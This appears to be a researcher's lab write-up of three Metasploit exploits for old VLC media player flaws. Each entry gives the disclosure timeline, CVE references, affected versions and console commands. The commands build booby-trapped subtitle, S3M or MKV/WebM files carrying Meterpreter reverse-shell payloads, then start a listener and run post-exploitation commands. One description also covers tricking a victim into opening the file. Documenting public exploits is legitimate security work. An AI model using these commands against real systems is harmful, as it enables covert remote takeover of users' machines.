Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein the 2008-11-03
Coordinated public release of the vulnerability the 2008-11-05
Metasploit PoC provided the 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.9.5 down to 0.5.0

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.

Commands :

use exploit/windows/fileformat/vlc_realtext
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted the 2011-03-25
libmodplug vendor release a new version the 2011-04-02
libmodplug vulnerability vulnérabilité publicly released the 2011-04-07
VideoLAN VLC 1.1.9 released the 2011-04-12
Metasploit PoC provided by duck the 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid

Timeline :

Vulnerability discovered by Dan Rosenberg
Vulnerability privately submitted to the vendor by Dan Rosenberg the 2010-01-26
Coordinated vulnerability disclosure and new version released the 2010-01-30
Metasploit PoC released the 2010-02-01

PoC provided by :

Dan Rosenberg

Reference(s) :

CVE-2011-0531
SA1102

Affected version(s) :

VideoLAN VLC version 1.1.6 and previous versions.
With version 1.1.1 to 1.1.6 you will only get a DoS of VLC, caused by SetProcessDEPPoly.

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.0 released the 2010-06-22, version how don’t contain SetProcessDEPPoly.

Description :

This module exploits an input validation error in VideoLAN VLC version 1.1.6 and previous versions. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, This module will only work against systems that do not support NX or are too old to have SetProcessDEPPolicy.

Since 2011-02-08, jduck from Metasploit team, has update vlc_webm to work with DEP !

Commands :

use exploit/windows/fileformat/vlc_webm
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
sysinfo
ipconfig